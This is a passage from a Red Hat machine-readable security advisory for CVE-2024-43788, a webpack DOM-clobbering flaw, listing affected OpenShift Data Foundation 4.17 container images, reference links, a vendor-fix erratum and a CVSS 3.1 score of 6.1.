"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
